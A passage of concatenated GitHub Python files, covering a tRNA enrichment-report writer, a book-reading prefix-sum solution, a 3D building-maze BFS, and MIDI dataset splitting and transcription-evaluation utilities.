        ponderate[nt] = round(ponderate[nt] * 100 / len(list_aa), 1)
    count_pond = sorted_string(ponderate)
    for key in res.keys():
        res[key] = curstr.count(key)
    count_str, count_prop = sorted_string(res, curstr)
    # extend the three summaries with the ambiguous IUPAC codes (Y, R, W, ...)
    res_iupac = create_iupac_dic(res)
    pond_iupac = create_iupac_dic(ponderate)
    count_str_iupac, count_prop_iupac = sorted_string(res_iupac, curstr)
    count_pond_iupac = sorted_string(pond_iupac)
    count_str = count_str + " - " + count_str_iupac
    count_prop = count_prop + " - " + count_prop_iupac
    count_pond = str(count_pond) + " - " + str(count_pond_iupac)
    return count_str, count_prop, count_pond
def get_content_group_enrichment2(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number, name, reg_dic):
    """
    Like get_content_group_enrichment, plus three nucleotide-composition
    columns computed from the amino acids aggregated in each group.

    :param control_frequencies: (dictionary of floats) a dictionary containing the amino acid nature frequencies of the
    control sets
    :param interest_frequencies: (dictionary of floats) a dictionary frequency of each amino acid nature in the user set
    of exons
    :param interest_frequencies_5p: (dictionary of floats) group frequencies in the 5' part of the user set
    :param interest_frequencies_3p: (dictionary of floats) group frequencies in the 3' part of the user set
    :param dic_p_val: (dictionary of floats) a dictionary containing the p_values
    :param set_number: (int) the number of set to create
    :param name: (string) : the name of the first column
    :param reg_dic: (dictionary of list of string) : dictionary having keys corresponding to the group of interest and
    a list associated to those keys corresponding to the amino acid aggregated in those groups
    :return: (list of list of strings, dict) the sheet content (each sublist is
    a row) and the BH-corrected p-value of each group
    """
    dic_padjust = {}
    content = [[name, "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
                "average_frequencies_of_the_"+str(set_number)+"_sets", "IC_90_of_the_"+str(set_number)+"_sets",
                "p_values_like", "FDR", "regulation_(p<=0.05)", "regulation(fdr<=0.05)", "nb_nt_group", "prop_nt_group", "ponderate_nt_group"]]
    ic_90 = calculate_ic_90(control_frequencies)
    p_vals = list()
    for nature in dic_p_val.keys():
        p_vals.append(dic_p_val[nature])
    # Benjamini-Hochberg correction through R's stats::p.adjust (rpy2)
    rstats = importr('stats')
    p_adjust = rstats.p_adjust(FloatVector(p_vals), method="BH")
    i = 0
    for nature in dic_p_val.keys():
        # nucleotide count / proportion / weighted proportion for the amino
        # acids aggregated in this group
        info_count, info_prop, count_pond = get_group_nt_info(reg_dic[nature])
        regulation, regulation_fdr = check_regulation(interest_frequencies[nature], ic_90[nature],
                                                      dic_p_val[nature], p_adjust[i])
        content.append([str(nature), str(interest_frequencies[nature]), str(interest_frequencies_5p[nature]), str(interest_frequencies_3p[nature]),
                        str(np.mean(control_frequencies[nature])), str(ic_90[nature]), str(dic_p_val[nature]),
                        str(p_adjust[i]), str(regulation), str(regulation_fdr), str(info_count), str(info_prop), str(count_pond)])
        dic_padjust[nature] = p_adjust[i]
        i += 1
    return content, dic_padjust
def writing_enrichment_report_file(control_frequencies_codon, codon_frequencies, codon_frequencies_5p, codon_frequencies_3p, dic_p_val_codon,
                                   control_frequencies_aa, aa_frequencies, aa_frequencies_5p, aa_frequencies_3p, dic_p_val_aa,
                                   control_ft_frequencies, ft_frequency, ft_frequency_5p, ft_frequency_3p, dic_p_val_ft,
                                   control_ftr_frequencies, ftr_frequency, ftr_frequency_5p, ftr_frequency_3p, dic_p_val_ftr,
                                   control_ftor_frequencies, ftor_frequency, ftor_frequency_5p, ftor_frequency_3p, dic_p_val_ftor,
                                   control_nucleic_acid_frequencies, nucleic_acid_frequency, nucleic_acid_frequency_5p, nucleic_acid_frequency_3p, dic_p_val_nt,
                                   control_ntp_frequencies, ntp_frequency, ntp_frequency_5p, ntp_frequency_3p, dic_p_val_ntp,
                                   control_dnt_frequencies, dnt_frequency, dnt_frequency_5p, dnt_frequency_3p, dic_p_val_dnt,
                                   control_hexa_frequencies, hexa_frequency, hexa_frequency_5p, hexa_frequency_3p, dic_p_val_hexa,
                                   control_diaa_frequencies, diaa_frequency, diaa_frequency_5p, diaa_frequency_3p, dic_p_val_diaa,
                                   output_folder, set_number):
    """
    Create the enrichment_report.xlsx workbook (one sheet per feature class).

    Each group of five parameters describes one feature class (codon, amino
    acid, feature, feature ratio, opposed feature ratio, nucleotide,
    nucleotide-by-position, dinucleotide, hexanucleotide, di-amino-acid):
    control-set frequencies, user-set frequencies (whole / 5' / 3'), and
    raw p-values.

    :param output_folder: (string) directory where the workbook is written
    :param set_number: (int) number of control sets (used in column headers)
    :return: (dict, dict) the BH-corrected p-values for codons and amino acids
    """
    workbook = xlsxwriter.Workbook(output_folder + "enrichment_report.xlsx")
    # setting the formats
    header_format = workbook.add_format({'bg_color': '#00DCFF', 'align': 'center', 'valign': 'vcenter', 'border': True})
    normal_format = workbook.add_format({'align': 'center', 'valign': 'vcenter', 'border': True})
    # getting the sheet content
    codon_content, dic_padjust_codon = get_content_codon_enrichment(control_frequencies_codon,
                                                                    codon_frequencies, codon_frequencies_5p, codon_frequencies_3p, dic_p_val_codon,
                                                                    set_number)
    aa_content, dic_padjust_aa = get_content_amino_acid_enrichment(control_frequencies_aa, aa_frequencies, aa_frequencies_5p, aa_frequencies_3p,
                                                                   dic_p_val_aa, set_number)
    # the *_list constants below fix the display order of the rows; " "
    # entries produce blank separator rows
    ft_list = ["Very-small", "Small#2", "Large", "Disorder-promoting#1", "Order-promoting#1", "Disorder-promoting#2",
               "Order-promoting#2", "Polar-uncharged#1", "Polar-uncharged#2", "Charged#1", "Charged#2", "Hydrophilic#1",
               "Hydrophobic#1", "Neutral", "Hydroxylic", "Negatively-charged", "Positively-charged#1",
               "Positively-charged#2"]
    ft_content, dic_padjust_ft = get_content_group_enrichment(control_ft_frequencies,
                                                              ft_frequency,
                                                              ft_frequency_5p,
                                                              ft_frequency_3p,
                                                              dic_p_val_ft,
                                                              set_number, "feature", ft_list)
    ftr_list = ["Very-small/(Very-small+Large)", "Large/(Very-small+Large)", "Small#2/(Small#2+Large)",
                "Large/(Small#2+Large)", "Disorder#1/(Disorder#1+Order#1)", "Order#1/(Disorder#1+Order#1)",
                "Disorder#2/(Disorder#2+Order#2)", "Order#2/(Disorder#2+Order#2)", "Uncharged#1/(Uncharged#1+Charged#1)",
                "Charged#1/(Uncharged#1+Charged#1)", "Uncharged#2/(Uncharged#2+Charged#1)",
                "Charged#1/(Uncharged#2+Charged#1)", "Uncharged#2/(Uncharged#2+Charged#2)",
                "Charged#2/(Uncharged#2+Charged#2)", "Neutral/(Neutral+Charged#2)", "Charged#2/(Neutral+Charged#2)",
                "Hydrophilic#1/(Hydrophilic#1+Hydrophobic#1)", "Hydrophobic#1/(Hydrophilic#1+Hydrophobic#1)",
                "Hydroxylic/(Hydroxylic+Negatively-charged)", "Negatively-charged/(Hydroxylic+Negatively-charged)",
                "Negatively-charged/(Positively-charged#1+Negatively-charged)",
                "Positively-charged#1/(Positively-charged#1+Negatively-charged)",
                "Negatively-charged/(Positively-charged#2+Negatively-charged)",
                "Positively-charged#2/(Positively-charged#2+Negatively-charged)"]
    ftr_content, dic_padjust_ftr = get_content_group_enrichment(control_ftr_frequencies,
                                                                ftr_frequency,
                                                                ftr_frequency_5p,
                                                                ftr_frequency_3p,
                                                                dic_p_val_ftr,
                                                                set_number, "feature_ratio", ftr_list)
    ftor_list = ["Very-small/Large", "Small#2/Large", "Disorder#1/Order#1", "Disorder#2/Order#2", "Polar-uncharged#1/Charged#1",
                 "Polar-uncharged#2/Charged#1", "Polar-uncharged#1/Charged#2", "Polar-uncharged#2/Charged#2",
                 "Neutral/Charged#2", "Hydrophilic#1/Hydrophobic#1", "Hydroxylic/Negatively-charged",
                 "Negatively-charged/Positively-charged#1", "Negatively-charged/Positively-charged#2"]
    ftor_content, dic_padjust_ftor = get_content_group_enrichment(control_ftor_frequencies,
                                                                  ftor_frequency,
                                                                  ftor_frequency_5p,
                                                                  ftor_frequency_3p,
                                                                  dic_p_val_ftor,
                                                                  set_number, "opposed_feature_ratio", ftor_list)
    # nucleotides grouped with their IUPAC complements, separated by blanks
    nt_list = ["A", "G", "C", "T", " ", "Y", "R", " ", "S", "W", " ", "K", "M", " ", "D", "C", " ", "V", "T", " ", "H", "G", " ",
               "B", "A"]
    nt_content, dic_padjust_nt = get_content_group_enrichment(control_nucleic_acid_frequencies,
                                                              nucleic_acid_frequency,
                                                              nucleic_acid_frequency_5p,
                                                              nucleic_acid_frequency_3p,
                                                              dic_p_val_nt,
                                                              set_number, "nt_info", nt_list)
    # nucleotide-by-codon-position keys (e.g. "A1" = A at codon position 1)
    ntp_list = ["A1", "A1n2", "A2", "A3", "C1", "C1n2", "C2", "C3", "G1", "G1n2", "G2", "G3", "T1", "T1n2", "T2", "T3",
                "Y1", "Y2", "Y3", "R1", "R2", "R3", "S1", "S1n2", "S2", "S3", "W1", "W1n2", "W2", "W3", "K1", "K1n2", "K2", "K3", "M1", "M1n2", "M2", "M3",
                "D1", "D2", "D3", "V1", "V2", "V3", "H1", "H2", "H3", "B1", "B2", "B3"]
    ntp_content, dic_padjust_ntp = get_content_group_enrichment(control_ntp_frequencies,
                                                                ntp_frequency,
                                                                ntp_frequency_5p,
                                                                ntp_frequency_3p,
                                                                dic_p_val_ntp,
                                                                set_number, "ntp_info", ntp_list)
    # build the dinucleotide display list: each ambiguous IUPAC pair followed
    # by its four concrete expansions, then a blank separator row
    iu = {"Y": ["C", "T"], "R": ["A", "G"], "W": ["A", "T"], "S": ["G", "C"], "K": ["T", "G"],
          "M": ["C", "A"]}
    dnt_list = []
    for k1 in iu.keys():
        for k2 in iu.keys():
            dnt_list.append(k1 + k2)
            dnt_list.append(iu[k1][0] + iu[k2][0])
            dnt_list.append(iu[k1][0] + iu[k2][1])
            dnt_list.append(iu[k1][1] + iu[k2][0])
            dnt_list.append(iu[k1][1] + iu[k2][1])
            dnt_list.append(" ")
    dnt_content, dic_padjust_dnt = get_content_group_enrichment(control_dnt_frequencies,
                                                                dnt_frequency,
                                                                dnt_frequency_5p,
                                                                dnt_frequency_3p,
                                                                dic_p_val_dnt,
                                                                set_number, "dnt_info", dnt_list)
    hexa_content, dic_padjust_hexa = get_content_group_enrichment(control_hexa_frequencies,
                                                                  hexa_frequency,
                                                                  hexa_frequency_5p,
                                                                  hexa_frequency_3p,
                                                                  dic_p_val_hexa,
                                                                  set_number, "hexanucleotide")
    diaa_content, dic_padjust_diaa = get_content_group_enrichment(control_diaa_frequencies,
                                                                  diaa_frequency,
                                                                  diaa_frequency_5p,
                                                                  diaa_frequency_3p,
                                                                  dic_p_val_diaa,
                                                                  set_number, "di-aa")
    # creating the sheets...
    codon_sheet = workbook.add_worksheet("codon")
    aa_sheet = workbook.add_worksheet("amino_acid")
    ft_sheet = workbook.add_worksheet("feature")
    ftr_sheet = workbook.add_worksheet("feature_ratio")
    ftor = workbook.add_worksheet("opposed_feature_ratio")
    nt_sheet = workbook.add_worksheet("nt_info")
    ntp_sheet = workbook.add_worksheet("nt_pos_info")
    dnt_sheet = workbook.add_worksheet("dnt_info")
    hexa_sheet = workbook.add_worksheet("hexa_info")
    diaa_sheet = workbook.add_worksheet("di-aa_info")
    # filling the sheets...
    sheet_filler(codon_content, codon_sheet, header_format, normal_format)
    sheet_filler(aa_content, aa_sheet, header_format, normal_format)
    sheet_filler(ft_content, ft_sheet, header_format, normal_format)
    sheet_filler(ftr_content, ftr_sheet, header_format, normal_format)
    sheet_filler(ftor_content, ftor, header_format, normal_format)
    sheet_filler(nt_content, nt_sheet, header_format, normal_format)
    sheet_filler(ntp_content, ntp_sheet, header_format, normal_format)
    sheet_filler(dnt_content, dnt_sheet, header_format, normal_format)
    sheet_filler(hexa_content, hexa_sheet, header_format, normal_format)
    sheet_filler(diaa_content, diaa_sheet, header_format, normal_format)
    workbook.close()
    # only the codon and amino-acid corrected p-values are returned; the other
    # dic_padjust_* results are computed but unused here
    return dic_padjust_codon, dic_padjust_aa
| LBMC/Fontro_Aube_2019 | tRNA_program/enrichiment_report_maker.py | enrichiment_report_maker.py | py | 30,880 | python | en | code | 0 | github-code | 90 |
18189274109 | from bisect import bisect_right
N, M, K = map(int, input().split())
A = list(map(int, input().split()))
B = list(map(int, input().split()))
# prefix sums of reading times for the books on desks A and B
# (A_sum[i] = minutes needed to read the first i books of A)
A_sum = [0]
for minutes in A:
    A_sum.append(A_sum[-1] + minutes)
B_sum = [0]
for minutes in B:
    B_sum.append(B_sum[-1] + minutes)
ans = 0
# try every possible number of books read from desk A
for cntA in range(N + 1):
    rest = K - A_sum[cntA]  # time remaining after reading cntA books from A
    if rest < 0:
        break
    # binary search: largest number of B-books whose total time fits in rest
    cntB = bisect_right(B_sum, rest) - 1
    ans = max(ans, cntA + cntB)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02623/s942005296.py | s942005296.py | py | 601 | python | en | code | 0 | github-code | 90 |
19255700245 | from sys import stdin
from collections import deque
# 6-connectivity offsets (d_row, d_col, d_floor): the four horizontal
# neighbours plus one floor down/up
moving_dir = [[-1, 0, 0], [1, 0, 0], [0, -1, 0], [0, 1, 0], [0, 0, -1], [0, 0, 1]]
def bfs(building, floors, rows, cols, cur_row, cur_col, cur_floor):
    """
    Breadth-first search through a 3D grid of floors.

    Starts from the given cell (the 'S' cell), expands through '.' cells
    using the 6-neighbourhood in ``moving_dir`` and returns the number of
    steps needed to reach the 'E' cell, or -1 when it is unreachable.
    Visited cells are overwritten in ``building`` as a "seen" marker.
    """
    frontier = deque([[cur_row, cur_col, cur_floor]])
    building[cur_floor][cur_row][cur_col] = "-"  # mark the start as visited
    steps = 0
    while frontier:
        # process one BFS level per iteration so `steps` tracks the distance
        for _ in range(len(frontier)):
            row, col, floor = frontier.popleft()
            if building[floor][row][col] == 'E':
                return steps
            for d_row, d_col, d_floor in moving_dir:
                n_row, n_col, n_floor = row + d_row, col + d_col, floor + d_floor
                if not (0 <= n_row < rows and 0 <= n_col < cols and 0 <= n_floor < floors):
                    continue
                cell = building[n_floor][n_row][n_col]
                if cell == '.' or cell == 'E':
                    if cell != 'E':
                        building[n_floor][n_row][n_col] = '_'  # mark visited
                    frontier.append([n_row, n_col, n_floor])
        steps += 1
    return -1
def main():
    """Read 3D mazes from ./input.txt and print the escape time of each."""
    # NOTE(review): this local assignment shadows the module-level
    # `from sys import stdin` inside main() — input is read from the file.
    stdin = open('./input.txt', 'r')
    while True:
        num_of_floors, rows, cols = map(int, stdin.readline().split())
        # "0 0 0" terminates the input
        if num_of_floors == 0 and rows == 0 and cols == 0:
            break
        building = []
        for _ in range(num_of_floors):
            floor = []
            # rows + 1 reads also consume the blank line between floors;
            # empty lines are skipped by the length check below
            for _ in range(rows + 1):
                row = list(stdin.readline().rstrip())
                if len(row) != 0:
                    floor.append(row)
            building.append(floor)
        # locate the start cell 'S' (presumably unique per maze — the inner
        # break only leaves the column loop; TODO confirm)
        start_point = []
        for floor in range(num_of_floors):
            for row in range(rows):
                for col in range(cols):
                    if building[floor][row][col] == 'S':
                        start_point.append(row)
                        start_point.append(col)
                        start_point.append(floor)
                        break
        distance = bfs(building, num_of_floors, rows, cols, start_point[0], start_point[1], start_point[2])
        if distance == -1:
            print("Trapped!")
        else:
            print(f"Escaped in {distance} minute(s).")


if __name__ == '__main__':
    main()
| ag502/algorithm | Problem/BOJ_6593_상범 빌딩/main.py | main.py | py | 2,456 | python | en | code | 1 | github-code | 90 |
13248935702 | from copy import deepcopy
# Advent of Code 2020, day 16 (ticket translation).
# Parse input.txt in three sections (rules / your ticket / nearby tickets),
# tracked by the state variable `s` which advances on blank lines.
s = 0
rules = dict()
my_ticket = []
nearby_tickets = []
with open('input.txt', 'r') as f:
    for line in f:
        l = line.replace('\n', ' ')
        if s == 0:
            if l.isspace():
                s = 1
            else:
                # e.g. "class: 1-3 or 5-7" -> rules['class'] = [1, 2, 3, 5, 6, 7]
                splitted = l.split(': ')
                vals = splitted[1].split(' or ')
                rules[splitted[0]] = []
                for v in vals:
                    in_val = v.split('-')
                    rules[splitted[0]] += list(range(int(in_val[0]), int(in_val[1]) + 1))
        elif s == 1:
            if l.isspace():
                s = 2
            elif not l.startswith('your'):
                my_ticket = [int(n) for n in l.split(',')]
        else:
            if not l.startswith('nearby'):
                nearby_tickets.append([int(n) for n in l.split(',')])

# Part 1: sum every value that matches no rule at all, and drop the tickets
# containing such values before part 2. (Renamed from `sum`, which shadowed
# the builtin.)
error_rate = 0
part2_nearby_tickets = nearby_tickets.copy()
for n in nearby_tickets:
    for m in n:
        if not any([m in rules[k] for k in rules]):
            error_rate += m
            # Bug fix: a ticket can hold several invalid values; the previous
            # unconditional remove() raised ValueError on the second one.
            if n in part2_nearby_tickets:
                part2_nearby_tickets.remove(n)
print(error_rate)

# Part 2: for each rule, collect every column index it could describe.
part2_rules = dict()
for k in rules:
    part2_rules[k] = []
    i = 0
    while i < len(rules.keys()):
        good = True
        for m in part2_nearby_tickets:
            good = good and (m[i] in rules[k])
        if good:
            part2_rules[k].append(i)
        i += 1

# Resolve the rule -> column assignment by repeated elimination. When an
# elimination empties some rule's candidate list, restart from scratch while
# remembering (in `cannot_delete`) which columns must not be removed first.
sorted_part2_rules = {k: v for k, v in sorted(part2_rules.items(), key=lambda item: item[1], reverse=True)}
temp = deepcopy(sorted_part2_rules)
keys = list(temp.keys())
cannot_delete = []
while keys:
    k = keys.pop(0)
    deletable_numbers = [x for x in temp[k] if x not in cannot_delete]
    if len(temp[k]) == 1 and (temp[k][0] in cannot_delete):
        removed_number = temp[k][0]
    else:
        removed_number = deletable_numbers[0]
    for in_k in temp.keys():
        if in_k != k and removed_number in temp[in_k]:
            temp[in_k].remove(removed_number)
    if not all([len(temp[t]) > 0 for t in temp]):
        # dead end: undo everything and protect this column from deletion
        temp = deepcopy(sorted_part2_rules)
        keys = list(temp.keys())
        cannot_delete.append(removed_number)

# Multiply my ticket's values for all "departure *" fields.
ans = 1
for k in temp:
    if k.startswith('departure'):
        k_i = temp[k][0]
        ans *= my_ticket[k_i]
print(ans)
39063706388 | from counters.count import add, sub, mul
import secondary
def hello():
    """Ask the user for their name on stdin and greet them on stdout."""
    print("Hello", input("What is your name: "))
def main():
    """Entry point: greet the user, then print the results of secondary.foo
    and of the arithmetic helpers imported from counters.count."""
    hello()
    x = secondary.foo(1)
    print(x)
    print(add(3, 4))
    print(sub(3, 4))
    # Bug fix: the module imports `mul`, not `multiply` — the original call
    # raised NameError at runtime.
    print(mul(3, 4))


if __name__ == "__main__":
    main()
| WilliamPyke/vigilant-fortnight | main.py | main.py | py | 306 | python | en | code | 0 | github-code | 90 |
12417112382 | from random import shuffle
import os
import pretty_midi as pm
import numpy as np
import mir_eval.transcription
def safe_mkdir(dir, clean=False):
    """
    Create ``dir`` if it does not exist yet.

    When ``clean`` is True and the directory is not empty, every plain file
    it contains is moved into a fresh ``dir/old`` subfolder (existing
    subdirectories are left in place).
    """
    if not os.path.exists(dir):
        os.makedirs(dir)
    if clean and os.listdir(dir) != []:
        old_path = os.path.join(dir, "old")
        safe_mkdir(old_path)
        for name in os.listdir(dir):
            source = os.path.join(dir, name)
            if not os.path.isdir(source):
                os.rename(source, os.path.join(old_path, name))
def move_files(file_list, folder1, folder2):
    """
    Relocate each file named in ``file_list`` from ``folder1`` to ``folder2``.

    :param file_list: (list of string) file names (not full paths) to move
    :param folder1: (string) source directory
    :param folder2: (string) destination directory
    """
    for file_name in file_list:
        source = os.path.join(folder1, file_name)
        destination = os.path.join(folder2, file_name)
        os.rename(source, destination)
def split_files(folder,test=0.2,valid=0.1):
    """
    Randomly split the .mid files of ``folder`` into train/valid/test
    subfolders.

    :param folder: (string) directory containing the .mid files
    :param test: (float) fraction of files moved to folder/test
    :param valid: (float) fraction of files moved to folder/valid
    (the remainder goes to folder/train)
    """
    midi_list = [x for x in os.listdir(folder) if x.endswith('.mid')]
    train_path = os.path.join(folder,"train/")
    valid_path = os.path.join(folder,"valid/")
    test_path = os.path.join(folder,"test/")
    safe_mkdir(train_path)
    safe_mkdir(valid_path)
    safe_mkdir(test_path)
    N = len(midi_list)
    N_test = int(N*test)
    N_valid = int(N*valid)
    # random split: shuffle, then slice into [test | valid | train]
    shuffle(midi_list)
    test_list, valid_list, train_list = midi_list[:N_test], midi_list[N_test:N_test+N_valid],midi_list[N_test+N_valid:]
    move_files(test_list,folder,test_path)
    move_files(valid_list,folder,valid_path)
    move_files(train_list,folder,train_path)
def unsplit_files(folder):
    """
    Undo split_files: move every file from folder/train, folder/valid and
    folder/test back into ``folder`` and remove the three subfolders.
    """
    sub_names = ("train/", "valid/", "test/")
    for sub in sub_names:
        sub_path = os.path.join(folder, sub)
        move_files(os.listdir(sub_path), sub_path, folder)
    for sub in sub_names:
        os.rmdir(os.path.join(folder, sub))
def write_namelist_as_pickle(folder):
    """
    Dump the train/valid/test .mid file names of ``folder`` into
    folder/namelist.p (pickle format).
    """
    #Only used once, to make sure the local and distant datasets are the same
    def get_name_list(subfolder):
        # collect the .mid file names of one split subfolder
        namelist = []
        for fn in os.listdir(subfolder):
            if fn.endswith('.mid'):
                namelist += [fn]
        return namelist
    train_path = os.path.join(folder,'train')
    valid_path = os.path.join(folder,'valid')
    test_path = os.path.join(folder,'test')
    namelist = {'train': get_name_list(train_path),
                'valid':get_name_list(valid_path),
                'test':get_name_list(test_path)}
    import pickle as pickle
    pickle.dump(namelist, open(os.path.join(folder,'namelist.p'), "wb"))
def split_files_with_namelist(folder):
    """
    Split the .mid files of ``folder`` into train/valid/test subfolders
    according to the saved folder/namelist.p produced by
    write_namelist_as_pickle (deterministic counterpart of split_files).
    """
    #Only used once, to make sure the local and distant datasets are the same
    import pickle as pickle
    namelist = pickle.load(open(os.path.join(folder,'namelist.p'), "rb"))
    train_list = namelist['train']
    valid_list = namelist['valid']
    test_list = namelist['test']
    train_path = os.path.join(folder,'train')
    valid_path = os.path.join(folder,'valid')
    test_path = os.path.join(folder,'test')
    safe_mkdir(train_path)
    safe_mkdir(valid_path)
    safe_mkdir(test_path)
    move_files(test_list,folder,test_path)
    move_files(valid_list,folder,valid_path)
    move_files(train_list,folder,train_path)
def get_chord_counter(subfolder):
    """
    Count chord occurrences encoded in the MIDI file names of ``subfolder``.

    File names look like "C_G_01.mid": the underscore-separated fields are
    chord names and the trailing suffix tells how the three chord slots are
    filled:
      - "0.mid" (or a single chord field): the same chord three times
      - "01.mid": first chord once, second chord twice
      - "02.mid": first chord twice, second chord once
      - anything else: the raw chord fields are kept as-is
    :return: (list of tuples) the (chord, count) pairs sorted by chord name
    """
    from collections import Counter
    occurrences = []
    for file_name in os.listdir(subfolder):
        if not file_name.endswith('.mid'):
            continue
        parts = file_name.split("_")
        suffix = parts.pop()
        if suffix == "0.mid" or len(parts) == 1:
            occurrences += [parts[0]] * 3
        elif suffix == "01.mid":
            occurrences += [parts[0], parts[1], parts[1]]
        elif suffix == "02.mid":
            occurrences += [parts[0], parts[0], parts[1]]
        else:
            # unrecognised suffix: count the raw chord fields once each
            occurrences += parts
    return sorted(Counter(occurrences).items())
def get_chord_counter_by_position(subfolder):
    """
    Count, for each of the three chord slots encoded in the MIDI file names of
    ``subfolder``, how often every chord occupies that slot.

    :return: (3 lists of tuples) sorted (chord, count) pairs for slot 0, 1, 2
    """
    from collections import Counter
    midi_list = [x for x in os.listdir(subfolder) if x.endswith('.mid')]
    chord_list = []
    for midi in midi_list:
        chords = midi.split("_")
        suffix = chords.pop()
        # expand the file-name encoding into the three chord slots (same
        # convention as get_chord_counter)
        if suffix == "0.mid" or len(chords) == 1:
            chords = [chords[0],chords[0],chords[0]]
        elif suffix == "01.mid":
            chords = [chords[0],chords[1],chords[1]]
        elif suffix == "02.mid":
            chords = [chords[0],chords[0],chords[1]]
        elif suffix == "012.mid":
            # NOTE(review): debug print only — such a file keeps its raw
            # 2-element field list, so count_position(2) below would raise
            # IndexError; presumably "012" files never occur in practice
            print(chords)
        chord_list += [chords]
    def count_position(i):
        # count which chord occupies slot i across all files
        count_list = []
        for chord in chord_list:
            count_list += [chord[i]]
        return Counter(count_list)
    counter0 = count_position(0)
    counter1 = count_position(1)
    counter2 = count_position(2)
    return sorted(counter0.items()),sorted(counter1.items()),sorted(counter2.items())
def my_get_end_time(midi_data):
    """
    Return the time of the last note-off over all instruments of
    ``midi_data``, or 0. when there are no notes. Only note end times are
    considered (not other MIDI events).
    """
    note_ends = [note.end
                 for instrument in midi_data.instruments
                 for note in instrument.notes]
    return max(note_ends) if note_ends else 0.
def check_corrupt(subfolder):
    """
    Print the .mid files of ``subfolder`` whose piano-roll length disagrees
    with their last note-off time by more than one second (a sign of a
    corrupt file).
    """
    midi_list = [os.path.join(subfolder,x) for x in os.listdir(subfolder) if x.endswith('.mid')]
    for midi_file in midi_list:
        midi = pm.PrettyMIDI(midi_file)
        piano_roll = midi.get_piano_roll()
        # duration implied by the piano roll — assumes the default pretty_midi
        # sampling rate of 100 columns per second; TODO confirm
        len1 = piano_roll.shape[1]/100
        # duration implied by the latest note-off event
        len2 = my_get_end_time(midi)
        if abs(len1-len2) > 1:
            print(midi_file+", len1 = "+str(len1)+", len2 = "+str(len2))
def filter_short_notes(data, thresh=1):
    """
    Zero out every note of a binary piano-roll lasting ``thresh`` steps or
    fewer.

    :param data: binary array of shape (batch, pitch, time)
    :param thresh: (int) minimum kept duration in time steps (strictly greater
    durations are kept)
    :return: int array of the same shape with the short notes removed
    """
    padded = np.pad(data, ((0, 0), (0, 0), (1, 1)), 'constant')
    transitions = np.diff(padded, axis=2)  # +1 at note onsets, -1 at offsets
    on_b, on_p, on_t = np.where(transitions == 1)
    off_b, off_p, off_t = np.where(transitions == -1)
    # onsets/offsets pair up in order; keep only sufficiently long notes
    keep = (off_t - on_t) > thresh
    filtered = np.zeros(padded.shape)
    filtered[on_b[keep], on_p[keep], on_t[keep]] = 1
    filtered[off_b[keep], off_p[keep], off_t[keep]] = -1
    # integrate the kept transitions back into a binary roll and strip padding
    return np.cumsum(filtered, axis=2)[:, :, :-2].astype(int)
def get_notes_intervals(data, fs):
    """Convert a single binary piano roll (pitch x time) into note events.

    Returns (pitches, intervals): pitch numbers (row index + 1) and
    [onset, offset] times in seconds given the frame rate *fs*.
    """
    # Pad the time axis so notes touching either border still yield a
    # matching onset/offset pair in the difference signal.
    padded = np.pad(data, ((0, 0), (1, 1)), 'constant')
    delta = padded[:, 1:] - padded[:, :-1]
    on_rows, on_cols = np.where(delta == 1)
    off_rows, off_cols = np.where(delta == -1)
    assert on_rows.shape == off_rows.shape
    assert on_cols.shape == off_cols.shape
    pitches = []
    intervals = []
    for pitch_on, start, pitch_off, stop in zip(on_rows, on_cols, off_rows, off_cols):
        # np.where orders events row by row, so pairs must share a pitch.
        assert pitch_on == pitch_off
        pitches.append(pitch_on + 1)
        intervals.append([start / float(fs), stop / float(fs)])
    return np.array(pitches), np.array(intervals)
def TP(data, target):
    """True positives per batch item: prediction and target both active."""
    return np.sum((data == 1) & (target == 1), axis=(1, 2))
def FP(data, target):
    """False positives per batch item: predicted active, target silent."""
    return np.sum((data == 1) & (target == 0), axis=(1, 2))
def FN(data, target):
    """False negatives per batch item: predicted silent, target active."""
    return np.sum((data == 0) & (target == 1), axis=(1, 2))
def precision(data, target, mean=True):
    """Framewise precision TP/(TP+FP); batch-averaged when *mean* is True."""
    tp = TP(data, target).astype(float)
    fp = FP(data, target)
    # eps guards against 0/0 when a batch item has no positive predictions.
    scores = tp / (tp + fp + np.finfo(float).eps)
    return np.mean(scores) if mean else scores
def recall(data, target, mean=True):
    """Framewise recall TP/(TP+FN); batch-averaged when *mean* is True."""
    tp = TP(data, target).astype(float)
    fn = FN(data, target)
    scores = tp / (tp + fn + np.finfo(float).eps)
    return np.mean(scores) if mean else scores
def accuracy(data, target, mean=True):
    """Framewise accuracy TP/(TP+FP+FN); batch-averaged when *mean* is True."""
    tp = TP(data, target).astype(float)
    fp = FP(data, target)
    fn = FN(data, target)
    scores = tp / (tp + fp + fn + np.finfo(float).eps)
    return np.mean(scores) if mean else scores
def Fmeasure(data, target, mean=True):
    """Framewise F1 from precision and recall; batch-averaged when *mean*."""
    prec = precision(data, target, mean=False)
    rec = recall(data, target, mean=False)
    scores = 2 * prec * rec / (prec + rec + np.finfo(float).eps)
    return np.mean(scores) if mean else scores
def compute_eval_metrics_frame(data1, data2, threshold=None):
    """Framewise F-measure, precision and recall of *data1* against *data2*.

    If *threshold* is given, *data1* is binarised at that value first.
    Returns (F, precision, recall), each batch-averaged.
    """
    # `is not None` replaces the unidiomatic `not threshold == None`.
    if threshold is not None:
        data1 = (data1 > threshold).astype(int)
    prec = precision(data1, data2)
    rec = recall(data1, data2)
    F = Fmeasure(data1, data2)
    return F, prec, rec
def compute_eval_metrics_note(data1, data2, fs, threshold=None, min_dur=None, tolerance=None):
    """Notewise evaluation of predicted rolls *data1* against targets *data2*.

    data1/data2: (batch, pitch, time) piano rolls; *fs* is the frame rate.
    If *threshold* is given, *data1* is binarised first.  Notes shorter than
    *min_dur* seconds are discarded (default 50 ms; pass 0 to keep all).
    Onset matching uses *tolerance* seconds (default 0.05) via mir_eval.
    Returns the batch mean of [F, precision, recall].
    """
    # `is (not) None` replaces the unidiomatic `== None` comparisons.
    if threshold is not None:
        data1 = (data1 > threshold).astype(int)
    # Suppress spuriously short notes before matching.
    if min_dur is None:
        data_filt = filter_short_notes(data1, thresh=int(round(fs * 0.05)))
    elif min_dur == 0:
        data_filt = data1
    else:
        data_filt = filter_short_notes(data1, thresh=int(round(fs * min_dur)))
    if tolerance is None:
        tolerance = 0.05
    results = []
    for data, target in zip(data_filt, data2):
        notes_est, intervals_est = get_notes_intervals(data, fs)
        notes_ref, intervals_ref = get_notes_intervals(target, fs)
